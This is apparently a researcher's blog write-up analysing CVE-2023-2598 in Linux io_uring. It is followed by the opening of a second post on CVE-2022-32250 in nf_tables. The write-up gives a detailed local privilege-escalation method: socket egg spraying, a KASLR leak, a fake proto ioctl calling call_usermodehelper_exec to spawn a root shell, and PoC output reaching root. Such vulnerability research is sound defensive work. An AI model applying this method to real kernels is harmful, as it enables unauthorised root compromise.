a place of anatomical precision

Conquering the memory through io_uring - Analysis of CVE-2023-2598

2023-11-17T14:00:00+00:00

Two months ago, I decided to look into the io_uring subsystem of the Linux Kernel.

Eventually, I stumbled upon an email disclosing a vulnerability within io_uring. The email’s subject was “Linux kernel io_uring out-of-bounds access to physical memory”. It immediately piqued my interest.

I had to put my research on pause as preparation for this year’s European Cyber Security Challenge was sucking up most of my free time. Anyway, now that ECSC is over, I was able to look into it and decided to do a write-up of this powerful vulnerability.

The io_uring subsystem in a nutshell
Vulnerability
- Root Cause
  - Understanding page folios
Exploitation
Acknowledgements

The io_uring subsystem in a nutshell

I will try to provide a very short and basic introduction to the io_uring subsystem and its most integral components.

I recommend reading Chompie’s amazing introduction to the subsystem if you want to get a more complete idea of how io_uring works.

What is io_uring?

In a nutshell, io_uring is an API for Linux allowing applications to perform “system calls” asynchronously. It provides significant performance improvements over using normal syscalls. It allows your program to not wait on blocking syscalls and because of how it is implemented, lowers the number of actual syscalls needed to be performed.

Submission and Completion Queues

At the core of every io_uring implementation sit two ring buffers - the submission queue (SQ) and the completion queue (CQ). Those ring buffers are shared between the application and the kernel.

In the submission queue are put Submission Queue Entries (SQEs), each describing a syscall you want to be performed. The application then performs an io_uring_enter syscall to effectively tell the kernel that there is work waiting to be done in the submission queue.

It is even possible to set up submission queue polling that eliminates the need to use io_uring_enter, reducing the number of real syscalls needed to be performed to 0.

After the kernel performs the operation it puts a Completion Queue Entry (CQE) into the completion queue ring buffer which can then be consumed by the application.

Fixed buffers

You can register fixed buffers to be used by operations that read or write data. The pages that those buffers span will be pinned and mapped for use, avoiding future copies to and from user space.

Registration of buffers happens through the io_uring_register syscall with the IORING_REGISTER_BUFFERS operation and the selection of buffers for use with the IOSQE_BUFFER_SELECT SQE flag. For an example case of use, check this out.

As fixed buffers are the protagonist of our story, we will see more of them later.

liburing

Thankfully there is a library that provides helpers for setting up io_uring instances and interacting with the subsystem - liburing. It makes easy, operations like setting up buffers, producing SQEs, collecting CQEs, and so on.

It provides a simplified interface to io_uring that developers (including exploit developers) can use to make their lives easier.

As liburing is maintained by Jens Axboe, the maintainer of io_uring, it can be relied upon to be up-to-date with the kernel-side changes.

Vulnerability

A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer.

The vulnerability was introduced in version 6.3-rc1 (commit 57bebf807e2a) and was patched in 6.4-rc1 (commit 776617db78c6).

Root Cause

The root cause of the vulnerability is a faulty optimization when buffers are registered.

Buffers get registered through an io_uring_register system call by passing the IORING_REGISTER_BUFFERS opcode. This invokes io_sqe_buffers_register, which in return calls io_sqe_buffer_register to register each of the buffers. This is where the vulnerability arises.

/* io_uring/rsrc.c */
static int io_sqe_buffer_register(struct io_ring_ctx *ctx, struct iovec *iov,
				  struct io_mapped_ubuf **pimu,
				  struct page **last_hpage)
{
	struct io_mapped_ubuf *imu = NULL;
	struct page **pages = NULL; // important to remember: *struct page* refers to physical pages
	unsigned long off;
	size_t size;
	int ret, nr_pages, i;
	struct folio *folio = NULL;

	*pimu = ctx->dummy_ubuf;
	if (!iov->iov_base) // if base is NULL
		return 0;

	ret = -ENOMEM;
	pages = io_pin_pages((unsigned long) iov->iov_base, iov->iov_len,
				&nr_pages); // pins the pages that the iov occupies
	// returns a pointer to an array of *page* pointers 
	// and sets nr_pages to the number of pinned pages
	if (IS_ERR(pages)) {
		ret = PTR_ERR(pages);
		pages = NULL;
		goto done;
	}
    ...

Let’s first make clear what our “building blocks” are and what they are used for.

To this function are passed four arguments - the context, an iovec pointer, an io_mapped_ubuf pointer and a pointer to last_hpage (this value is always NULL).

An iovec is just a structure that describes a buffer, with the start address of the buffer and its length. Nothing more.

struct iovec
{
	void __user *iov_base;	// the address at which the buffer starts
	__kernel_size_t iov_len; // the length of the buffer in bytes
};

When we pass a buffer to be registered we pass it as an iovec. Here the *iov pointer in this function points to a structure, containing information about the buffer that the user wants to register.

An io_mapped_ubuf is a structure that holds the information about a buffer that has been registered to an io_uring instance.

struct io_mapped_ubuf {
	u64		ubuf; // the address at which the buffer starts
	u64		ubuf_end; // the address at which it ends
	unsigned int	nr_bvecs; // how many bio_vec(s) are needed to address the buffer 
	unsigned long	acct_pages;
	struct bio_vec	bvec[]; // array of bio_vec(s)
};

The last member of io_mapped_buf is an array of bio_vec(s). A bio_vec is kind of like an iovec but for physical memory. It defines a contiguous range of physical memory addresses.

struct bio_vec {
	struct page	*bv_page; // the first page associated with the address range
	unsigned int	bv_len; // length of the range (in bytes)
	unsigned int	bv_offset; // start of the address range relative to the start of bv_page
};

And struct page is of course just a structure describing a physical page of memory.

In the code snippet above, the pages that the iov spans get pinned to memory ensuring they stay in the main memory and are exempt from paging. An array pages is returned that contains pointers to the struct page(s) that the iov spans and nr_pages gets set to the number of pages.

Let’s now continue with io_sqe_buffer_register.

    ...
	/* If it's a huge page, try to coalesce them into a single bvec entry */
	if (nr_pages > 1) { // if more than one page
		folio = page_folio(pages[0]); // converts from page to folio
		// returns the folio that contains this page
		for (i = 1; i < nr_pages; i++) {
			if (page_folio(pages[i]) != folio) { // different folios -> not physically contiguous 
				folio = NULL; // set folio to NULL as we cannot coalesce into a single entry
				break;
			}
		}
		if (folio) { // if all the pages are in the same folio
			folio_put_refs(folio, nr_pages - 1); 
			nr_pages = 1; // sets nr_pages to 1 as it can be represented as a single folio page
		}
	}
    ...

Here if the iov spans more than a single physical page, the kernel will loop through pages to check if they belong to the same folio. But what even is folio?

Understanding page folios

To understand what a folio is we need to first understand what a page really is according to the kernel. Usually by a page people mean the smallest block of physical memory which can be mapped by the kernel (most commonly 4096 bytes but might be larger). Well, that isn’t really what a page is in the context of the kernel. The definition has been expanded to include compound pages which are multiple contiguous single pages - which makes things confusing.

Compound pages have a “head page” that holds the information about the compound page and is marked to make clear the nature of the compound page. All the “tail pages” are marked as such and contain a pointer to the “head page”. But that creates a problematic ambiguity - if a page pointer for a tail page is passed to a function, is the function supposed to act on just that singular page or the whole compound page?

So to address this confusion the concept of “page folios” was introduced. A “page folio” is essentially a page that is guaranteed to not be a tail page. This clears out the ambiguity as functions meant to not operate on singular tail pages will take struct *folio as an argument instead of struct *page.

struct folio {
       struct page page;
};

The folio structure is just a wrapper around page. It should be noted that every page is a part of a folio. Non-compound page’s “page folio” is the page itself. Now that we know what a page folio is we can dissect the code above.

The code above is meant to identify if the pages that the buffer being registered spans are part of a single compound page. It iterates through the pages and checks if their folio is the same. If so it sets the number of pages nr_pages to 1 and sets the folio variable. Now here comes the issue…

The code that checks if the pages are from the same folio doesn’t actually check if they are consecutive. It can be the same page mapped multiple times. During the iteration page_folio(page) would return the same folio again and again passing the checks. This is an obvious logic bug. Let’s continue with io_sqe_buffer_register and see what the fallout is.

    ...
	imu = kvmalloc(struct_size(imu, bvec, nr_pages), GFP_KERNEL); 
	// allocates imu with an array for nr_pages bio_vec(s)
	// bio_vec - a contiguous range of physical memory addresses
	// we need a bio_vec for each (physical) page
    // in the case of a folio - the array of bio_vec(s) will be of size 1
	if (!imu)
		goto done;

	ret = io_buffer_account_pin(ctx, pages, nr_pages, imu, last_hpage);
	if (ret) {
		unpin_user_pages(pages, nr_pages);
		goto done;
	}

	off = (unsigned long) iov->iov_base & ~PAGE_MASK;
	size = iov->iov_len; // sets the size to that passed by the user!
	/* store original address for later verification */
	imu->ubuf = (unsigned long) iov->iov_base; // user-controlled
	imu->ubuf_end = imu->ubuf + iov->iov_len; // calculates the end based on the length
	imu->nr_bvecs = nr_pages; // this would be 1 in the case of folio
	*pimu = imu;
	ret = 0;

	if (folio) { // in case of folio - we need just a single bio_vec (efficiant!)
		bvec_set_page(&imu->bvec[0], pages[0], size, off);
		goto done;
	}
	for (i = 0; i < nr_pages; i++) { 
		size_t vec_len;

		vec_len = min_t(size_t, size, PAGE_SIZE - off);
		bvec_set_page(&imu->bvec[i], pages[i], vec_len, off);
		off = 0;
		size -= vec_len;
	}
done:
	if (ret)
		kvfree(imu);
	kvfree(pages);
	return ret;
}

A single bio_vec is allocated as nr_pages = 1. The size of the buffer that is written in pimu->iov_len and pimu->bvec[0].bv_len is the one passed by the user in iov->iov_len.

Exploitation

Now that our logic bug is clear let’s see how it can be exploited.

An Incredible Primitive

Let’s now imagine that we are registering a buffer that spans multiple virtual pages but each of them is the same page mapped again and again. This buffer is virtually contiguous, as the virtual memory is contiguous, but it isn’t physically contiguous. When the buffer goes through the faulty code that checks if the pages belong to a compound page - it will pass them, fooling the kernel that it spans multiple pages as part of a compound page while in reality, it is just a single page.

This means that pimu->bvec.bv_len will be set to the virtual length of the buffer because the kernel believes that the virtually contiguous memory is backed by physically contiguous memory. As we established, bio_vec(s) deal with physical ranges of memory. This buffer will be registered and give us access to the physical pages following the one that was mapped to construct the buffer.

We can register a buffer spanning n virtual pages but a single physical one. After registering this buffer we can use io_uring operations to read from the buffer as well as write to it - giving us an out-of-bound access to n-1 physical pages. Here n could be as high as the limit set for mappings allowed to a single userland process. We have a multi-page out-of-bounds read and write.

This is an incredibly powerful primitive, perhaps even the most powerful I have seen yet.

Target Objects

We are looking for target objects that allow us to leak KASLR and get some kind of code execution.

Thankfully as we have an OOB read and write to whole physical pages, we don’t have any limits on the objects themselves, we don’t care what slab they use, what their size is or anything like that.

We do however have some requirements. We need to be able to find our target objects and identify them. We will be leaking thousands of pages and we need to be able to find our needle(s) in the haystack. We need to be able to place an egg in the object itself using which we can later identify the object.

Sockets

Here sockets are our friend. They are pretty massive objects containing both user-controlled fields, which can be used to place an egg, as well as function pointers which can be used to leak KASLR.

struct sock {
	struct sock_common         __sk_common;          /*     0   136 */
	/* --- cacheline 2 boundary (128 bytes) was 8 bytes ago --- */
	struct dst_entry *         sk_rx_dst;            /*   136     8 */
	int                        sk_rx_dst_ifindex;    /*   144     4 */
	u32                        sk_rx_dst_cookie;     /*   148     4 */
	socket_lock_t              sk_lock;              /*   152    32 */
	atomic_t                   sk_drops;             /*   184     4 */
	int                        sk_rcvlowat;          /*   188     4 */
	/* --- cacheline 3 boundary (192 bytes) --- */
	struct sk_buff_head        sk_error_queue;       /*   192    24 */
	struct sk_buff_head        sk_receive_queue;     /*   216    24 */
	struct {
		atomic_t           rmem_alloc;           /*   240     4 */
		int                len;                  /*   244     4 */
		struct sk_buff *   head;                 /*   248     8 */
		/* --- cacheline 4 boundary (256 bytes) --- */
		struct sk_buff *   tail;                 /*   256     8 */
	} sk_backlog;                                    /*   240    24 */
	int                        sk_forward_alloc;     /*   264     4 */
	u32                        sk_reserved_mem;      /*   268     4 */
	unsigned int               sk_ll_usec;           /*   272     4 */
	unsigned int               sk_napi_id;           /*   276     4 */
	int                        sk_rcvbuf;            /*   280     4 */

	/* XXX 4 bytes hole, try to pack */

	struct sk_filter *         sk_filter;            /*   288     8 */
	union {
		struct socket_wq * sk_wq;                /*   296     8 */
		struct socket_wq * sk_wq_raw;            /*   296     8 */
	};                                               /*   296     8 */
	struct xfrm_policy *       sk_policy[2];         /*   304    16 */
	/* --- cacheline 5 boundary (320 bytes) --- */
	struct dst_entry *         sk_dst_cache;         /*   320     8 */
	atomic_t                   sk_omem_alloc;        /*   328     4 */
	int                        sk_sndbuf;            /*   332     4 */
	int                        sk_wmem_queued;       /*   336     4 */
	refcount_t                 sk_wmem_alloc;        /*   340     4 */
	long unsigned int          sk_tsq_flags;         /*   344     8 */
	union {
		struct sk_buff *   sk_send_head;         /*   352     8 */
		struct rb_root     tcp_rtx_queue;        /*   352     8 */
	};                                               /*   352     8 */
	struct sk_buff_head        sk_write_queue;       /*   360    24 */
	/* --- cacheline 6 boundary (384 bytes) --- */
	__s32                      sk_peek_off;          /*   384     4 */
	int                        sk_write_pending;     /*   388     4 */
	__u32                      sk_dst_pending_confirm; /*   392     4 */
	u32                        sk_pacing_status;     /*   396     4 */
	long int                   sk_sndtimeo;          /*   400     8 */
	struct timer_list          sk_timer;             /*   408    40 */

	/* XXX last struct has 4 bytes of padding */

	/* --- cacheline 7 boundary (448 bytes) --- */
	__u32                      sk_priority;          /*   448     4 */
	__u32                      sk_mark;              /*   452     4 */
	long unsigned int          sk_pacing_rate;       /*   456     8 */
	long unsigned int          sk_max_pacing_rate;   /*   464     8 */
    // .. many more fields
	/* size: 760, cachelines: 12, members: 92 */
	/* sum members: 754, holes: 1, sum holes: 4 */
	/* sum bitfield members: 16 bits (2 bytes) */
	/* paddings: 2, sum paddings: 6 */
	/* forced alignments: 1 */
	/* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));

Taking a look at sk_setsockopt in net/core/sock.c we can see what fields of the sock structure we can set.

Some fields we could potentially set like sk_mark would require us to drop into a network namespace to obtain CAP_NET_ADMIN. Thankfully there are some options that don’t have such requirements to set them.

Some good options that we could utilize are SO_MAX_PACING_RATE (sets sk_max_pacing_rate), SO_SNDBUF (sets sk_sndbuf) and SO_RCVBUF (sets sk_rcvbuf).

Two eggs

Here perhaps the best option that we could pick is SO_MAX_PACING_RATE. It has one obvious advantage - we can use it to place two eggs, one at sk_max_pacing_rate and one at sk_pacing_rate. When the option SO_MAX_PACING_RATE is being set, the value of sk_pacing_rate is set to the new value of sk_max_pacing_rate if it is lower than the current value of sk_pacing_rate. Looking at the function sock_init_data_uid we see that sk_pacing_rate is initialized to ~0UL = 0xffffffffffffffff.

The obvious question is - why would we need two eggs? As we are leaking many pages we could meet our egg outside the context of a sock object. I tested it and indeed sometimes the first egg found was not a one in a sock object. By looking for two eggs at a fixed distance from one another, we are ensuring that the matches we find will be the sock objects we are looking for.

Identifying the sockets

We want to have a way to identify which socket we have found in memory. We can do that through the SO_SNDBUF option by storing the file descriptor of the socket in it. In reality, we have to kind of “encode” the value by doing fd + SOCK_MIN_SNDBUF and “decode” it on read by doing val / 2 - SOCK_MIN_SNDBUF.

Now the value of SOCK_MIN_SNDBUF is calculated using the following formula 2 * (2048 + ALIGN(sizeof(sk_buff), 1 << L1_CACHE_SHIFT)). The exact value depends on the value of L1_CACHE_SHIFT. In my case L1_CACHE_SHIFT = 6, therefore SOCK_MIN_SNDBUF = 4608.

Leaking KASLR

At the end of struct sock, there are quite a few function pointers.

struct sock {
    ...
	void                       (*sk_state_change)(struct sock *); /*   672     8 */
	void                       (*sk_data_ready)(struct sock *); /*   680     8 */
	void                       (*sk_write_space)(struct sock *); /*   688     8 */
	void                       (*sk_error_report)(struct sock *); /*   696     8 */
	/* --- cacheline 11 boundary (704 bytes) --- */
	int                        (*sk_backlog_rcv)(struct sock *, struct sk_buff *); /*   704     8 */
	void                       (*sk_destruct)(struct sock *); /*   712     8 */
    ...
} __attribute__((__aligned__(8)));

Leaking any of them is sufficient to defeat KASLR. For a TCP socket, they will be set to the following functions:

sk_state_change <-> ,
sk_data_ready <-> ,
sk_write_space <-> ,
sk_error_report <-> ,
sk_backlog_rcv <-> ,
sk_destruct <-> 

Privilege Escalation

Our ultimate goal is to achieve privilege escalation. With KASLR out of the way, we can move towards it.

As we already have control over a sock object we can use the same object to escalate. The first member of the sock object is struct sock_common which is the minimal network layer representation of sockets in the kernel.

struct sock_common {
	union {
		__addrpair         skc_addrpair;         /*     0     8 */
		struct {
			__be32     skc_daddr;            /*     0     4 */
			__be32     skc_rcv_saddr;        /*     4     4 */
		};                                       /*     0     8 */
	};                                               /*     0     8 */
	union {
		unsigned int       skc_hash;             /*     8     4 */
		__u16              skc_u16hashes[2];     /*     8     4 */
	};                                               /*     8     4 */
	union {
		__portpair         skc_portpair;         /*    12     4 */
		struct {
			__be16     skc_dport;            /*    12     2 */
			__u16      skc_num;              /*    14     2 */
		};                                       /*    12     4 */
	};                                               /*    12     4 */
	short unsigned int         skc_family;           /*    16     2 */
	volatile unsigned char     skc_state;            /*    18     1 */
	unsigned char              skc_reuse:4;          /*    19: 0  1 */
	unsigned char              skc_reuseport:1;      /*    19: 4  1 */
	unsigned char              skc_ipv6only:1;       /*    19: 5  1 */
	unsigned char              skc_net_refcnt:1;     /*    19: 6  1 */

	/* XXX 1 bit hole, try to pack */

	int                        skc_bound_dev_if;     /*    20     4 */
	union {
		struct hlist_node  skc_bind_node;        /*    24    16 */
		struct hlist_node  skc_portaddr_node;    /*    24    16 */
	};                                               /*    24    16 */
	struct proto *             skc_prot;             /*    40     8 */

	...

	/* size: 136, cachelines: 3, members: 25 */
	/* sum members: 135 */
	/* sum bitfield members: 7 bits, bit holes: 1, sum bit holes: 1 bits */
	/* last cacheline: 8 bytes */
};

We can see at offset 40 bytes from its start, a pointer to a struct proto object. A proto object describes how operations should be handled at the transport layer. It is primarily a collection of function pointers.

struct proto {
	void                       (*close)(struct sock *, long int); /*     0     8 */
	int                        (*pre_connect)(struct sock *, struct sockaddr *, int); /*     8     8 */
	int                        (*connect)(struct sock *, struct sockaddr *, int); /*    16     8 */
	int                        (*disconnect)(struct sock *, int); /*    24     8 */
	struct sock *              (*accept)(struct sock *, int, int *, bool); /*    32     8 */
	int                        (*ioctl)(struct sock *, int, long unsigned int); /*    40     8 */
	int                        (*init)(struct sock *); /*    48     8 */
	void                       (*destroy)(struct sock *); /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	void                       (*shutdown)(struct sock *, int); /*    64     8 */
	int                        (*setsockopt)(struct sock *, int, int, sockptr_t, unsigned int); /*    72     8 */
	int                        (*getsockopt)(struct sock *, int, int, char *, int *); /*    80     8 */

	...

	/* size: 432, cachelines: 7, members: 54 */
	/* sum members: 425, holes: 2, sum holes: 7 */
	/* last cacheline: 48 bytes */
};

Here we have quite a few candidates but the one we are really interested in is the ioctl. By writing our “gadget” to ioctl we will be able to invoke it by just invoking an ioctl call to the socket.

However in order to write our gadget at proto->ioctl we first need to set up a fake proto object. This is easy enough, we can write it below our sock object. To do this safely, we need to ensure that right after the sock object we aren’t overwriting anything that we shouldn’t be.

Making the sockets TCP sockets (tcp_sock), for example, gives us quite a bit of leeway.

Peeling back tcp_sock

tcp_sock is the top_level object.
struct inet_connection_sock inet_conn is the first member of tcp_sock
struct inet_sock icsk_inet is the first member of inet_connection_sock
struct sock sk is the first member of inet_sock

So in memory, stuff is set up the following way:

--- sock @0
----- inet_sock 
------ inet_connection_sock 
------- tcp_sock @1400

In total tcp_sock is of size 2208 bytes (on v6.3-rc1).

We have the freedom to place our fake proto object below sock proper, writing over the inet_sock. We will only need to restore the tcp_sock after making our ioctl call to its initial state so as to not accidentally panic the kernel when the socket gets destroyed.

call_usermodehelper_exec

A very clean gadget that we could use is call_usermodehelper_exec. It allows us to start a user-mode process from kernel space. It takes two arguments - (struct subprocess_info *sub_info, int wait).

Looking at struct proto we can see that the ioctl is defined as (*ioctl)(struct sock *, int, long unsigned int);. We cannot control sub_info - it will always be a pointer to our sock object.

So now the question is - are we able to write a fake subprocess_info object over the beginning of our socket without breaking it?

struct subprocess_info {
	struct work_struct         work;                 /*     0    32 */
	struct completion *        complete;             /*    32     8 */
	const char  *              path;                 /*    40     8 */
	char * *                   argv;                 /*    48     8 */
	char * *                   envp;                 /*    56     8 */
	/* --- cacheline 1 boundary (64 bytes) --- */
	int                        wait;                 /*    64     4 */
	int                        retval;               /*    68     4 */
	int                        (*init)(struct subprocess_info *, struct cred *); /*    72     8 */
	void                       (*cleanup)(struct subprocess_info *); /*    80     8 */
	void *                     data;                 /*    88     8 */

	/* size: 96, cachelines: 2, members: 10 */
	/* last cacheline: 32 bytes */
};

The first member of subprocess_info is a work_struct - an object that describes deferred work. Then we have parameters like path which holds a pointer to the path of our executable, argv which is a pointer to the array of pointers to each of the arguments and envp which is the same but for environment variables. The function pointer init holds the function that will be called on initialization to set up the credentials of the process - if it is set to null, it will start with the credentials of system workqueues (as root). Likewise, if cleanup is set, it gets executed after the subprocess exits.

Overlapping subprocess_info

As we established, our subprocess_info will need to overlap with the start of the sock object as the first argument of the ioctl is sock *. However, the first 136 bytes of struct sock are occupied by struct sock_common.

struct sock[sock_common]      | subprocess_info
============================================================
0x0: skc_addrpair             | work.data
0x8: skc_hash, skc_u16hashes  | work.entry.next
0x10: skc_portpair, ..., ...  | work.entry.prev
0x18: skc_bind_node[0:7]      | work.func
0x20: skc_bind_node[8:15]     | complete
0x28: skc_prot (struct proto) | path
0x30: skc_net                 | argv
0x38: skc_v6_daddr            | envp
0x40: *padding*               | wait, retval
0x48: skc_v6_rcv_saddr[0:7]   | *init
0x50: skc_v6_rcv_saddr[8:15]  | *cleanup
0x58: skc_cookie              | data
============================================================

As we see the value of skc_prot overlaps with path. If we set path to anything else we will be overwriting skc_prot which will break our exploit as we need skc_prot to point to our fake proto structure at the end of sock proper. So, can we overlap path with the start of our proto structure?

struct proto {
	void                       (*close)(struct sock *, long int); /*     0     8 */
	int                        (*pre_connect)(struct sock *, struct sockaddr *, int); /*     8     8 */
	int                        (*connect)(struct sock *, struct sockaddr *, int); /*    16     8 */
	int                        (*disconnect)(struct sock *, int); /*    24     8 */
	struct sock *              (*accept)(struct sock *, int, int *, bool); /*    32     8 */
	int                        (*ioctl)(struct sock *, int, long unsigned int); /*    40     8 */
	...
};

The only value in proto we need to keep is ioctl as it holds call_usermodehelper_exec. We don’t care about all other values as we won’t be connecting, disconnecting or closing the socket - so we can freely write over those members. This leaves us with 40 bytes free at the start of proto for our path. More than enough :)

Setting up the arguments

We also need to set up our arguments for subprocess_info. Our goal is to execute something like /bin/sh -c /bin/sh &>/dev/ttyS0 . Let’s break it down.


/bin/sh -c /bin/sh &>/dev/ttyS0 

We are essentially asking /bin/sh to spawn us another /bin/sh process but we redirect its stdin and stdout to our virtual console/serial port.

However, all of those strings need to go somewhere. We already established that path will need to go at the start of proto but there isn’t enough space there for all of those strings. A convenient location for them is overlapping with inet_sock / inet_connection_sock / tcp_sock after sock proper. There we can write both the strings and the argv array of pointers.

This though, presents another problem. In order to set up argv we need to know the addresses in memory of all the arguments we set up. So aside from KASLR, we need to also leak the address of our sock object in memory so we can calculate the location at which our arguments are.

Two members in sock from which we can obtain a self-pointer are sk_error_queue and sk_receive_queue - both are the doubly linked list nodes. Both nodes should be in a linked list by themselves and therefore should contain pointers to themselves. It should be said that while I observed that both were in empty linked lists, sk_error_queue is said in the documentation to be “rarely used” - so it is the wiser choice for the leak.

After obtaining the address of our sock structure in memory, the rest is just a simple matter of calculating offsets.

Setting up subprocess_info 
Let’s see how we are going to set the subprocess_info to escalate.
work.data          <-> set to 0
work.entry.next    <-> set to it's own address
work.entry.prev    <-> set to the address of work.entry.next
work.func          <-> set to call_usermodehelper_exec_work
complete           <-> irrelevant
path               <-> don't overwrite or overwrite it with the same value
argv               <-> write the address where the argv array was set up
envp               <-> set to 0, we have no env variables
wait               <-> irrelevant
retval             <-> irrelevant
*init              <-> set to 0
*cleanup           <-> set to 0
data               <-> irrelevant

We must write work.func to hold call_usermodehelper_exec_work. As you remember we wrote the value of proto->ioctl to be call_usermodehelper_exec. The function call_usermodehelper_exec is responsible for queuing up our deferred work while call_usermodehelper_exec_work is called to handle the deferred work, when it comes time for it - so the function call_usermodehelper_exec_work is the one responsible for spawning our new process.

We write path to remain the same, the address of our proto structure.

After this is done, making an ioctl call to our socket to spawn our new shell is all that is left :)

Proof of Concept 
Due to the astonishing primitive that this vulnerability gives us, the proof of concept is extremely reliable by nature.
$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ ./exploit
[*] CVE-2023-2598 Exploit by anatomic (@YordanStoychev)
memfd: 0, page: 0 at virt_addr: 0x4247000000, reading 266240000 bytes
memfd: 0, page: 500 at virt_addr: 0x42470001f4, reading 266240000 bytes
memfd: 0, page: 1000 at virt_addr: 0x42470003e8, reading 266240000 bytes
memfd: 0, page: 1500 at virt_addr: 0x42470005dc, reading 266240000 bytes
memfd: 0, page: 2000 at virt_addr: 0x42470007d0, reading 266240000 bytes
memfd: 0, page: 2500 at virt_addr: 0x42470009c4, reading 266240000 bytes
memfd: 0, page: 3000 at virt_addr: 0x4247000bb8, reading 266240000 bytes
memfd: 0, page: 3500 at virt_addr: 0x4247000dac, reading 266240000 bytes
memfd: 0, page: 4000 at virt_addr: 0x4247000fa0, reading 266240000 bytes
memfd: 0, page: 4500 at virt_addr: 0x4247001194, reading 266240000 bytes
memfd: 0, page: 5000 at virt_addr: 0x4247001388, reading 266240000 bytes
memfd: 0, page: 5500 at virt_addr: 0x424700157c, reading 266240000 bytes
memfd: 0, page: 6000 at virt_addr: 0x4247001770, reading 266240000 bytes
memfd: 0, page: 6500 at virt_addr: 0x4247001964, reading 266240000 bytes
memfd: 0, page: 7000 at virt_addr: 0x4247001b58, reading 266240000 bytes
memfd: 0, page: 7500 at virt_addr: 0x4247001d4c, reading 266240000 bytes
memfd: 0, page: 8000 at virt_addr: 0x4247001f40, reading 266240000 bytes
memfd: 0, page: 8500 at virt_addr: 0x4247002134, reading 266240000 bytes
memfd: 0, page: 9000 at virt_addr: 0x4247002328, reading 266240000 bytes
memfd: 0, page: 9500 at virt_addr: 0x424700251c, reading 266240000 bytes
memfd: 0, page: 10000 at virt_addr: 0x4247002710, reading 266240000 bytes
memfd: 0, page: 10500 at virt_addr: 0x4247002904, reading 266240000 bytes
memfd: 0, page: 11000 at virt_addr: 0x4247002af8, reading 266240000 bytes
memfd: 0, page: 11500 at virt_addr: 0x4247002cec, reading 266240000 bytes
memfd: 0, page: 12000 at virt_addr: 0x4247002ee0, reading 266240000 bytes
memfd: 0, page: 12500 at virt_addr: 0x42470030d4, reading 266240000 bytes
Found value 0xdeadbeefdeadbeef at offset 0x21c8
Socket object starts at offset 0x2000
kaslr_leak: 0xffffffffb09503f0
kaslr_base: 0xffffffffafe00000
found socket is socket number 1950
our struct sock object starts at 0xffff9817ff400000
fake proto structure set up at 0xffff9817ff400578
args at 0xffff9817ff400728
argv at 0xffff9817ff400750
subprocess_info set up at beginning of sock at 0xffff9817ff400000
calling ioctl...
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # w00t w00t

You can find my Proof of Concept - here.

Acknowledgements 
Tobias Holl, for outstanding research, discovering the vulnerability and PoC’ing it. Took the idea from him to use the the pacing rate of the socket as an egg :)

Valentina Palmiotti (chompie), for her amazing introduction to the io_uring subsystem in her article, Put an io_uring on it - Exploiting the Linux Kernel.



Conquering a Use-After-Free in nf_tables: Detailed Analysis and Exploitation of CVE-2022-32250
2023-02-04T14:00:00+00:00
Introduction
This article is a summarization of the research I recently conducted on CVE-2022-32250. 
Some (but not all) of my analysis and the process of exploiting the vulnerability were done live and can be found here.

My research sprung up from the write-up by theori.io. I found their article extremely insightful and perfect for those who seek an overview of the vulnerability and the way it is exploited. Kudos to them!

In this write-up, I will be providing an in-depth look into the vulnerability and the way it is exploited.

As this is a Netfilter vulnerability I recommend reading my article that provides an introduction to the inner workings of nf_tables. However, I will try to cover everything you need to know.

Table of Contents

  Background
    
      Sets
      Lookup Expression
    
  
  The Vulnerability
    
      Root Cause
    
  
  Exploitation
    
      Requirements
      Leaking a heap address
        
          Method of Exploitation
          Searching for a primitive
            
              struct user_key_payload
            
          
        
      
      Defeating KASLR
        
          Technique
          Leaking an address
          Summarizing the KASLR leak process
        
      
      Escalating via a modprobe_path overwrite
        
          Method of Exploitation
          Overwriting modprobe_path
        
      
    
  
  Proof-of-Concept
  Closing Remarks


Background 
Before we take a look at the root cause we need to look at some background information that is needed to understand the vulnerability.

Sets 
In nf_tables are utilized the so-called Sets. The scope of their usage is vast but if we are to extremely simplify and generalize them - they are a fancy key-value store that sometimes acts just as a list.

A quick example of set usage is: Imagine you had a list of ports (22, 80, 443). If you want to drop all the packets that come on that port you would add those ports in a set and then use an nft_lookup expression to check if the incoming packet’s port number is part of the set - and if so drop it.

/**
 * 	struct nft_set - nf_tables set instance
 *
 *	@list: table set list node
 *	@bindings: list of set bindings
 *	@table: table this set belongs to
 *	@net: netnamespace this set belongs to
 * 	@name: name of the set
 *	@handle: unique handle of the set
 * 	@ktype: key type (numeric type defined by userspace, not used in the kernel)
 * 	@dtype: data type (verdict or numeric type defined by userspace)
 * 	@objtype: object type (see NFT_OBJECT_* definitions)
 * 	@size: maximum set size
 *	@field_len: length of each field in concatenation, bytes
 *	@field_count: number of concatenated fields in element
 *	@use: number of rules references to this set
 * 	@nelems: number of elements
 * 	@ndeact: number of deactivated elements queued for removal
 *	@timeout: default timeout value in jiffies
 * 	@gc_int: garbage collection interval in msecs
 *	@policy: set parameterization (see enum nft_set_policies)
 *	@udlen: user data length
 *	@udata: user data
 *	@expr: stateful expression
 * 	@ops: set ops
 * 	@flags: set flags
 *	@genmask: generation mask
 * 	@klen: key length
 * 	@dlen: data length
 * 	@data: private set data
 */
struct nft_set {
	struct list_head		list;
	struct list_head		bindings;
	struct nft_table		*table;
	possible_net_t			net;
	char				*name;
	u64				handle;
	u32				ktype;
	u32				dtype;
	u32				objtype;
	u32				size;
	u8				field_len[NFT_REG32_COUNT];
	u8				field_count;
	u32				use;
	atomic_t			nelems;
	u32				ndeact;
	u64				timeout;
	u32				gc_int;
	u16				policy;
	u16				udlen;
	unsigned char			*udata;
	/* runtime data below here */
	const struct nft_set_ops	*ops ____cacheline_aligned;
	u16				flags:14,
					genmask:2;
	u8				klen;
	u8				dlen;
	u8				num_exprs;
	struct nft_expr			*exprs[NFT_SET_EXPR_MAX];
	struct list_head		catchall_list;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};

Here it is important to note that expressions can be added to sets in exprs and to note the bindings linked list.

Lookup Expression 
We already mentioned the existence of the nft_lookup expression… But what does it do?
The lookup expression is used to perform lookups into sets to check if a key or a value is present in the set.

Essentially in the example we provided after you set up your set with ports on which you want to drop packets, you will set up a lookup expression to perform the check on the incoming packets.

struct nft_lookup {
	struct nft_set			*set;
	u8				sreg;
	u8				dreg;
